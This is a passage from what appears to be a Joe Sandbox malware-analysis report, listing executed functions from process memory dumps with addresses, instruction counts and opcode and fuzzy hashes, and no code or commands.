                                                                                                • Opcode Fuzzy Hash: 23af8b02c83673e697804d6912b726cbfc3ac525e99587d5a450d14d2ff9be44
                                                                                                • Instruction Fuzzy Hash: 6FE0ED61F2AC5E4BE7B4FB5884A6BB82292AB5C740B160175D42ED22E2DD386D814741
                                                                                                Function 00007FFD9B885A16 Relevance: .0, Instructions: 23COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000030.00000002.2263623075.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_48_2_7ffd9b880000_VTixufCejPQZEvXiB.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ad5de0c6f0be1361825a16bf00fcf2b0ccf3fbe2b39e0edb8f03cc6ba9f90fc4
                                                                                                • Instruction ID: 2843981a3e9a9e6076dec504db07e9141593aa03f3f046dcc4f74931e887019a
                                                                                                • Opcode Fuzzy Hash: ad5de0c6f0be1361825a16bf00fcf2b0ccf3fbe2b39e0edb8f03cc6ba9f90fc4
                                                                                                • Instruction Fuzzy Hash: CBE04F71E29C2A0BE7B0F75884AA6B437D1EB5C341F554272D92DD32E1DE386D824B82
                                                                                                Function 00007FFD9B883DB4 Relevance: .0, Instructions: 11COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000030.00000002.2263623075.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_48_2_7ffd9b880000_VTixufCejPQZEvXiB.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f5ad3ed1db2a4fb20346d4fabfef610315c87c828e82cc93aeb04719ac574b59
                                                                                                • Instruction ID: 3af2870c22bc24fd68d5cde8808151eed352b9d01b11792f2ca58901f3f60972
                                                                                                • Opcode Fuzzy Hash: f5ad3ed1db2a4fb20346d4fabfef610315c87c828e82cc93aeb04719ac574b59
                                                                                                • Instruction Fuzzy Hash: 00C0EA20F2AD1E9BEAA8B3A484662B951C65F4C700B560574D1AED32E2DD2D6A408A40
                                                                                                Function 00007FFD9B886802 Relevance: .0, Instructions: 10COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000030.00000002.2263623075.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_48_2_7ffd9b880000_VTixufCejPQZEvXiB.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 75243df594dad3189b481bc2cafaadaf262bb75a415f265b74f5873103093f93
                                                                                                • Instruction ID: cac6f641e0f836e38aa70b5b9b9236bc1d6fb6d2235cd4a525db49e56f9d5373
                                                                                                • Opcode Fuzzy Hash: 75243df594dad3189b481bc2cafaadaf262bb75a415f265b74f5873103093f93
                                                                                                • Instruction Fuzzy Hash: 00C04C19F19C2A47F3697214483167D04929B48754F950074E46D976DECD5C5A0212C7
                                                                                                Function 00007FFD9B8A25D0 Relevance: .0, Instructions: 7COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000030.00000002.2263623075.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_48_2_7ffd9b8a1000_VTixufCejPQZEvXiB.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 22c0f85be38833c9e9902a2a0e4f14f72f945995ede4d930356bf2512360dc9d
                                                                                                • Instruction ID: e425a0db9fe55fa0ec8003d36a69f58f0e46986591355cacf7f74b1150c8a269
                                                                                                • Opcode Fuzzy Hash: 22c0f85be38833c9e9902a2a0e4f14f72f945995ede4d930356bf2512360dc9d
                                                                                                • Instruction Fuzzy Hash: C5A00205D97C0E02D81832FA2E9709474545F8E115FC62AA0EC188059AEA9E26E94393

                                                                                                Executed Functions

                                                                                                Function 00007FFD9B8B0D4C Relevance: 1.5, Strings: 1, Instructions: 261COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000031.00000002.2254533321.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_49_2_7ffd9b8b0000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 5X_H
                                                                                                • API String ID: 0-3241812158
                                                                                                • Opcode ID: 5772d9d23eed927ef1e5aada0b39a8a7798b155f0e66ec6aed5b18fdb32771f7
                                                                                                • Instruction ID: 7acab593d342c0346c400c0048ca2c5070366e2685689c22874cc1a5024dcfb0
                                                                                                • Opcode Fuzzy Hash: 5772d9d23eed927ef1e5aada0b39a8a7798b155f0e66ec6aed5b18fdb32771f7
                                                                                                • Instruction Fuzzy Hash: 8691DF71A19A9E8FE799DF6C88657FD7BF1EB59300F4001BED019CB2E2DA7518018781
                                                                                                Function 00007FFD9B8B0E43 Relevance: .2, Instructions: 171COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000031.00000002.2254533321.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_49_2_7ffd9b8b0000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 3e884727b10ddc15a2cb45d2db503d53a914a1ac726d7b1fb6bd2e9eb87e4a4e
                                                                                                • Instruction ID: c179e37cc03e7c4a5e076513fc4d4132796f8f95cfd2389d5995a490592623cc
                                                                                                • Opcode Fuzzy Hash: 3e884727b10ddc15a2cb45d2db503d53a914a1ac726d7b1fb6bd2e9eb87e4a4e
                                                                                                • Instruction Fuzzy Hash: 7651DE71A29A5E8AE398CF6C8865BFD7BF1EB99310F4001BED019C73D6DAB514118740
                                                                                                Function 00007FFD9B8B08D0 Relevance: .2, Instructions: 157COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000031.00000002.2254533321.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_49_2_7ffd9b8b0000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4c6c55c73d8cfc5d9a3d5589c873d0749c87b872294c34acf1ac3a8507f85722
                                                                                                • Instruction ID: c543bcd572307d75bea4f1371e65b937b2228b205a4f428d3b57d14a55fab603
                                                                                                • Opcode Fuzzy Hash: 4c6c55c73d8cfc5d9a3d5589c873d0749c87b872294c34acf1ac3a8507f85722
                                                                                                • Instruction Fuzzy Hash: DE411721B1D6691EE30AB7BC74BA5F97B90DF49325B0804FBD44AC71FBDD18684282C5
                                                                                                Function 00007FFD9B8B0910 Relevance: .1, Instructions: 146COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000031.00000002.2254533321.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_49_2_7ffd9b8b0000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 7ae844f7a6823ece56adf43a4e3d1d0ea095862588d1daea813473c40cbbb6d2
                                                                                                • Instruction ID: 6fcc22f50b54b78ae240e781f103aeb6d0a5a27b06e6277ee304f81b46d5670c
                                                                                                • Opcode Fuzzy Hash: 7ae844f7a6823ece56adf43a4e3d1d0ea095862588d1daea813473c40cbbb6d2
                                                                                                • Instruction Fuzzy Hash: 5E412821B1D6691EE30AB7BC74AA5F87B90DF49324B1804FFD04EC71FBDC18A8428285
                                                                                                Function 00007FFD9B8B0960 Relevance: .1, Instructions: 114COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000031.00000002.2254533321.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_49_2_7ffd9b8b0000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 622a15348f2f34da0442ed6a6419b19c81376432ccc8a949e69bb8fa1c7f465b
                                                                                                • Instruction ID: 5a8aee0d29eaee09d4b33e41250729198d7ac17eb4800ae4afd933aff7a387d2
                                                                                                • Opcode Fuzzy Hash: 622a15348f2f34da0442ed6a6419b19c81376432ccc8a949e69bb8fa1c7f465b
                                                                                                • Instruction Fuzzy Hash: 3C310421B1DA691FE359B7BC68AA6F977D1DF49325B0400FAD40EC71EBDC18A8428285
                                                                                                Function 00007FFD9B8B1171 Relevance: .1, Instructions: 107COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000031.00000002.2254533321.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_49_2_7ffd9b8b0000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 06041c352d0847b47fe8faaa3225ec18f0a0dde4ffbe6863e3dccdb9ba792b9d
                                                                                                • Instruction ID: e114c76ef1bfa3f3ef1521e23bdfdb047b12b278670c4c42147653d30f773e5b
                                                                                                • Opcode Fuzzy Hash: 06041c352d0847b47fe8faaa3225ec18f0a0dde4ffbe6863e3dccdb9ba792b9d
                                                                                                • Instruction Fuzzy Hash: DD31D830A1E69E8FDF55EB78C8659A97BF0FF1A310B0505FEC049CB1A3DA289945CB40
                                                                                                Function 00007FFD9B8B0998 Relevance: .1, Instructions: 104COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000031.00000002.2254533321.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_49_2_7ffd9b8b0000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a4372858468ac3901774509dee68f5f05ca3355bee189ba375a30f0f320e433d
                                                                                                • Instruction ID: 5f5035ef71f441ae2a8217c558d698feedf27dec675e80230906cbaeb659259b
                                                                                                • Opcode Fuzzy Hash: a4372858468ac3901774509dee68f5f05ca3355bee189ba375a30f0f320e433d
                                                                                                • Instruction Fuzzy Hash: E9310820B1D95D1FE758A77C846A6B97BE2EF48311B0400BDD44EC72F7DC24AC418691
                                                                                                Function 00007FFD9B8B0C25 Relevance: .1, Instructions: 88COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000031.00000002.2254533321.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_49_2_7ffd9b8b0000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2010e5859c756472a30761b866e2d21d8a90fc9300bde92f3a09a61dd3273927
                                                                                                • Instruction ID: e4b4bed8268ea8e8a83fedb7e7f0da6e520203c890d90c48f7208d000824ff9f
                                                                                                • Opcode Fuzzy Hash: 2010e5859c756472a30761b866e2d21d8a90fc9300bde92f3a09a61dd3273927
                                                                                                • Instruction Fuzzy Hash: 16212B35B1D26D8EE726A7B99C750EC3B60DF46324F1541B3C0488B1E3DA3866469BC1
                                                                                                Function 00007FFD9B8B4C51 Relevance: .1, Instructions: 85COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000031.00000002.2254533321.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_49_2_7ffd9b8b0000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2fe5a1047c464b4dc548f399d01c0fdbad4e908fcaa831eaed1d9b7408d4b529
                                                                                                • Instruction ID: 9f3385727d8b2cc08fc7197d39812b2f9c7c552fa47818446b52592a3d1c730f
                                                                                                • Opcode Fuzzy Hash: 2fe5a1047c464b4dc548f399d01c0fdbad4e908fcaa831eaed1d9b7408d4b529
                                                                                                • Instruction Fuzzy Hash: E8310C30E1856D8FEB64EB64C8657A972A1FB5C324F1501BDD41ED32E1CA39AE81CF81
                                                                                                Function 00007FFD9B8B2B87 Relevance: .1, Instructions: 53COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000031.00000002.2254533321.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_49_2_7ffd9b8b0000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: fb03ea30f86f86f15052075ada4d4a2d508b62150998cc3856ed7da703aad921
                                                                                                • Instruction ID: e937e15f948d3c27dfdbf5ec0682355f93cb35dc76ace9fff0c33b31d555ca63
                                                                                                • Opcode Fuzzy Hash: fb03ea30f86f86f15052075ada4d4a2d508b62150998cc3856ed7da703aad921
                                                                                                • Instruction Fuzzy Hash: 77111220B1A91E4FEBE4EFE498B57B87691EF5C300F5501B9C40DD72B2DE28AA448B40
                                                                                                Function 00007FFD9B8B0C40 Relevance: .1, Instructions: 52COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000031.00000002.2254533321.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_49_2_7ffd9b8b0000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b76f8001e1055fc7cc7995eb76a819d1b8f8aac81300f873391aee9d194f0473
                                                                                                • Instruction ID: 8997a36a2102db59481f1fcaa9c2102e68908c57ecca1e0767c3a9193018f56b
                                                                                                • Opcode Fuzzy Hash: b76f8001e1055fc7cc7995eb76a819d1b8f8aac81300f873391aee9d194f0473
                                                                                                • Instruction Fuzzy Hash: 9E11C231E1E69D8EE7129BB5886109C7BB0EF16710F1641F7C044CB2A2DA3866458B80
                                                                                                Function 00007FFD9B8B2C52 Relevance: .0, Instructions: 50COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000031.00000002.2254533321.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_49_2_7ffd9b8b0000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f62d585235e03e8f0fe5cf0a0dc88fb439a0e9531e71ba5ed5e023e472b342d9
                                                                                                • Instruction ID: 02ffbbc4c60b9e41f35058e1a215d7689e49aadaf53e5ceef04bd1ed1fa450ae
                                                                                                • Opcode Fuzzy Hash: f62d585235e03e8f0fe5cf0a0dc88fb439a0e9531e71ba5ed5e023e472b342d9
                                                                                                • Instruction Fuzzy Hash: 5E017521B1D91D4BEB64EFB4D4646B933C2DF99310F1601B9D409C32B2DD18A9418A84
                                                                                                Function 00007FFD9B8B0C48 Relevance: .0, Instructions: 46COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000031.00000002.2254533321.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_49_2_7ffd9b8b0000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 7ed9fce6a7932c94077c8a7c7e1cdb96515cfd114d964adc5cd2acaaf66fcb16
                                                                                                • Instruction ID: 8285b1c62ddee09ab4eb49582a742517658dadcdf118baf1e456ea4700d15cf2
                                                                                                • Opcode Fuzzy Hash: 7ed9fce6a7932c94077c8a7c7e1cdb96515cfd114d964adc5cd2acaaf66fcb16
                                                                                                • Instruction Fuzzy Hash: F9018031E1E29D8FE726DBB5886509C7FB0EF16714F1641F7C044DB2A2DA386A458B80
                                                                                                Function 00007FFD9B8B0C50 Relevance: .0, Instructions: 41COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000031.00000002.2254533321.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_49_2_7ffd9b8b0000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 08c2f98e2a67823a2d8519ad407df271f1fb8afb570465d885b2f4b0543f544a
                                                                                                • Instruction ID: 93bba0e88be5f8192bc0a9bc9df80bf5d381f60d7cf4ddf76a13645dc2ff8268
                                                                                                • Opcode Fuzzy Hash: 08c2f98e2a67823a2d8519ad407df271f1fb8afb570465d885b2f4b0543f544a
                                                                                                • Instruction Fuzzy Hash: FD017130E1E29D9FE726DBB5886409C7FB0EF16714F1541F7C444CB2A2DA386A458B80
                                                                                                Function 00007FFD9B8B2C9D Relevance: .0, Instructions: 35COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000031.00000002.2254533321.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_49_2_7ffd9b8b0000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b6e0be89d3b27c2fa4f56752da0536672b2e1be42a0abed2b0df82e3ba76eaa2
                                                                                                • Instruction ID: 7efc1e070507f1b1d07d279e7c1d3357dea427c20dbae2aa9f747e97543f9a0f
                                                                                                • Opcode Fuzzy Hash: b6e0be89d3b27c2fa4f56752da0536672b2e1be42a0abed2b0df82e3ba76eaa2
                                                                                                • Instruction Fuzzy Hash: 4CF0F430A1991E8BEBA4FFE0D8A4AF97761EB58311F510179C409D72B1DE286A85CF80
                                                                                                Function 00007FFD9B8B0B77 Relevance: .0, Instructions: 34COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000031.00000002.2254533321.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_49_2_7ffd9b8b0000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 060cffaca336cb0d3cfac3e1fad823875f99ad9445770e9cb950afdb95b0b036
                                                                                                • Instruction ID: 89929804f1129a3ade144ee934d94b0f149d3a4a3d2bd470e64644883acab6d7
                                                                                                • Opcode Fuzzy Hash: 060cffaca336cb0d3cfac3e1fad823875f99ad9445770e9cb950afdb95b0b036
                                                                                                • Instruction Fuzzy Hash: DFF0E53160A6498FC7469B38D8954D47B60EB47215B9A21FAC089C75B2C628585FCB41
                                                                                                Function 00007FFD9B8B1DE1 Relevance: .0, Instructions: 30COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000031.00000002.2254533321.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_49_2_7ffd9b8b0000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e57fceeeb1556e59c31721969a994985ce87e26fce79365c099f9b97da087566
                                                                                                • Instruction ID: 2b5fb576462a97a68d41cc90a0280abca10e9ba81d939e967b6b9dd21a2095ce
                                                                                                • Opcode Fuzzy Hash: e57fceeeb1556e59c31721969a994985ce87e26fce79365c099f9b97da087566
                                                                                                • Instruction Fuzzy Hash: 76F03061F2E93E4AF7B0A7B484A57F812D1AF5D750F260075D40DE62A2CD28AE414EC1
                                                                                                Function 00007FFD9B8B2BC6 Relevance: .0, Instructions: 30COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000031.00000002.2254533321.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_49_2_7ffd9b8b0000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8c0c53da2c1fdb609a134df8646e88899382bc2d5736a2a9e3705598f2c545c1
                                                                                                • Instruction ID: b1876b50859ed9db4dcdf9f3d1a122a08009b8b64153dde116719c6c885c2f42
                                                                                                • Opcode Fuzzy Hash: 8c0c53da2c1fdb609a134df8646e88899382bc2d5736a2a9e3705598f2c545c1
                                                                                                • Instruction Fuzzy Hash: 82F03020B1981D8BEBB0EFA0D8A47B93351EB58311F1101B9C509D32B2CD296E448A80
                                                                                                Function 00007FFD9B8B0D02 Relevance: .0, Instructions: 28COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000031.00000002.2254533321.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_49_2_7ffd9b8b0000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a12ba42d2772fbd531d00387a27c2661fbd7e5f5a2e514cbcc68567c7e54eecd
                                                                                                • Instruction ID: bb0b71db0e119aad0b71ace0cf3dfa25b560674216fb90dba21daac1676a3427
                                                                                                • Opcode Fuzzy Hash: a12ba42d2772fbd531d00387a27c2661fbd7e5f5a2e514cbcc68567c7e54eecd
                                                                                                • Instruction Fuzzy Hash: 7BF0B430B1960ECEE799DBB984656FD77E0EF58711F1486BAD009C32E5DE3866848F80
                                                                                                Function 00007FFD9B8B29F8 Relevance: .0, Instructions: 25COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000031.00000002.2254533321.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_49_2_7ffd9b8b0000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b8d27797306fd73d96015c4517b216a8a38743e521279fa42fc03ddc30c82e75
                                                                                                • Instruction ID: 7d015098312588179eefd7b797a84deca6f2673416c7af05800439fe414c5546
                                                                                                • Opcode Fuzzy Hash: b8d27797306fd73d96015c4517b216a8a38743e521279fa42fc03ddc30c82e75
                                                                                                • Instruction Fuzzy Hash: 69E06D61F2EC3E4BE7A4EB7880E6BB822D1AB5C740B160036C00ED22A2CD186D414BC0
                                                                                                Function 00007FFD9B8B5A16 Relevance: .0, Instructions: 23COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000031.00000002.2254533321.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_49_2_7ffd9b8b0000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 7734605258e9bed2857d83c954cc0893c646848e9d564eaef14a0b2ab1e8c6ed
                                                                                                • Instruction ID: 278bcd434d80bc33f9e646d8370b5db0c7af250244e73b344087bc28810dfb46
                                                                                                • Opcode Fuzzy Hash: 7734605258e9bed2857d83c954cc0893c646848e9d564eaef14a0b2ab1e8c6ed
                                                                                                • Instruction Fuzzy Hash: BAE01A61E29C3A0BE7A0AB6884E66F827D1AB58340F554176D819D72A2DE286D814BC1
                                                                                                Function 00007FFD9B8B1295 Relevance: .0, Instructions: 16COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000031.00000002.2254533321.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_49_2_7ffd9b8b0000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2fed6537446232999c276a65cbd32d243c269a34746791fc3a8f2532be4c1c63
                                                                                                • Instruction ID: 4b64eea60694c8a02b0794d4527e08bd79eba3a0b25198a655777e53c068d5d2
                                                                                                • Opcode Fuzzy Hash: 2fed6537446232999c276a65cbd32d243c269a34746791fc3a8f2532be4c1c63
                                                                                                • Instruction Fuzzy Hash: BDC01214B5741A51D02873B9FC664F97750DF49228BC54071E00D85196DC4A158785D6
                                                                                                Function 00007FFD9B8B06A5 Relevance: .0, Instructions: 13COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000031.00000002.2254533321.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_49_2_7ffd9b8b0000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 375cb32467d2f4ac292aaf916916b72a978876b3ef50655b2c11cd79ef034476
                                                                                                • Instruction ID: 1ad863d4ad4891dff2bd1592ac7df51e5d7c704c4dc007f839920a61924f49a7
                                                                                                • Opcode Fuzzy Hash: 375cb32467d2f4ac292aaf916916b72a978876b3ef50655b2c11cd79ef034476
                                                                                                • Instruction Fuzzy Hash: E7C01200F2B62E00E83433BB98220ACA100ABCEA10FD20032C048800A1980D228909C6
                                                                                                Function 00007FFD9B8B12B8 Relevance: .0, Instructions: 12COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000031.00000002.2254533321.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_49_2_7ffd9b8b0000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2118bf5cbd7652e4d7e413182c64878a5aedab47cc3b41951ae0b3348f6e1aca
                                                                                                • Instruction ID: 1838179f8fa27feb3d39b58db7078738cebefe2b4d6c9c489a30d4fa099db743
                                                                                                • Opcode Fuzzy Hash: 2118bf5cbd7652e4d7e413182c64878a5aedab47cc3b41951ae0b3348f6e1aca
                                                                                                • Instruction Fuzzy Hash: C2C08C30A1180C9FC908EB3CC88480433A0FB0E200BC200E0E009C7170D629DCC0CB80
                                                                                                Function 00007FFD9B8B3DB4 Relevance: .0, Instructions: 11COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000031.00000002.2254533321.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_49_2_7ffd9b8b0000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
